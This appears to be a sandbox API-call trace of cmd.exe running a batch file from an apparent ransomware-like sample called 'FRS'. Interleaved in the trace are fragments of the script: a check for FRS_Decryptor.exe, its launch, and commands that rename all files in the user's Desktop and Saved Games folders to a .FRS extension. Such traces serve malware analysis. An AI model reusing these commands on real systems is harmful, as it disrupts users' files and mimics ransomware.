_wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.929] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0135.929] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x2ec, dwProcessId=0x934, dwThreadId=0x92c)) returned 1 [0135.931] CloseHandle (hObject=0x2ec) returned 1 [0135.931] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0135.932] GetEnvironmentStringsW () returned 0xd30508* [0135.932] FreeEnvironmentStringsA (penv="=") returned 1 [0135.932] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0137.996] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0137.996] CloseHandle (hObject=0x2b0) returned 1 [0137.996] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0137.996] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0137.996] GetEnvironmentStringsW () returned 0xd7e510* [0137.996] FreeEnvironmentStringsA (penv="=") returned 1 [0137.996] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.996] GetEnvironmentStringsW () returned 0xd30508* [0137.997] FreeEnvironmentStringsA (penv="=") returned 1 [0137.997] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0137.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0137.997] _close (_FileHandle=3) returned 0 [0137.997] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.997] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0137.997] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.997] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0137.997] _get_osfhandle (_FileHandle=0) returned 0x24 [0137.997] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0137.997] SetConsoleInputExeNameW () returned 0x1 [0137.997] GetConsoleOutputCP () returned 0x1b5 [0137.998] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0137.998] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.998] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0137.998] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0137.998] _get_osfhandle (_FileHandle=3) returned 0x260 [0137.998] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0137.998] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0137.998] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0137.998] SetFilePointer (in: hFile=0x260, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0137.998] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0137.998] GetFileType (hFile=0x260) returned 0x1 [0137.998] _get_osfhandle (_FileHandle=3) returned 0x260 [0137.998] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0137.999] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0137.999] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0137.999] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0137.999] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0137.999] GetFileType (hFile=0x260) returned 0x1 [0137.999] _get_osfhandle (_FileHandle=3) returned 0x260 [0137.999] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0137.999] _tell (_FileHandle=3) returned 2627 [0137.999] _close (_FileHandle=3) returned 0 [0137.999] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0137.999] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0137.999] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0137.999] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0137.999] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0138.003] feof (_File=0x76ea4c68) returned 0 [0138.003] ferror (_File=0x76ea4c68) returned 0 [0138.003] fgets (in: _Buf=0xd816b0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0138.446] feof (_File=0x76ea4c68) returned 0 [0138.446] ferror (_File=0x76ea4c68) returned 0 [0138.446] fgets (in: _Buf=0xd83ef6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0138.481] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0138.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43516, cbMultiByte=78, lpWideCharStr=0xd434c8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0138.481] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0138.481] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0138.482] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0138.482] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0138.482] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.482] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0138.482] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.482] GetFileSize (in: hFile=0x2b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0138.482] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0138.482] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.482] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0138.482] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.482] GetFileType (hFile=0x2b8) returned 0x1 [0138.482] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0138.482] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0138.482] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0138.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0138.482] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0138.482] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.482] GetFileType (hFile=0x2b8) returned 0x1 [0138.482] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0138.482] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0138.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0138.483] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.483] GetFileType (hFile=0x2b8) returned 0x1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0138.483] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.483] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.483] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.483] GetFileType (hFile=0x2b8) returned 0x1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.483] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0138.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0138.483] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.483] GetFileType (hFile=0x2b8) returned 0x1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0138.483] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0138.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0138.483] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.483] GetFileType (hFile=0x2b8) returned 0x1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0138.483] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0138.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0138.483] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0138.484] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.484] GetFileType (hFile=0x2b8) returned 0x1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0138.484] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0138.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0138.484] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.484] GetFileType (hFile=0x2b8) returned 0x1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0138.484] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0138.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0138.484] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.484] GetFileType (hFile=0x2b8) returned 0x1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0138.484] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0138.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0138.484] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.484] GetFileType (hFile=0x2b8) returned 0x1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0138.484] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0138.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0138.484] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.484] GetFileType (hFile=0x2b8) returned 0x1 [0138.484] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0138.485] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0138.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0138.485] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.485] GetFileType (hFile=0x2b8) returned 0x1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0138.485] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0138.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0138.485] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.485] GetFileType (hFile=0x2b8) returned 0x1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0138.485] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0138.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0138.485] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.485] GetFileType (hFile=0x2b8) returned 0x1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0138.485] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0138.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0138.485] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.485] GetFileType (hFile=0x2b8) returned 0x1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0138.485] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.485] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0138.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0138.486] 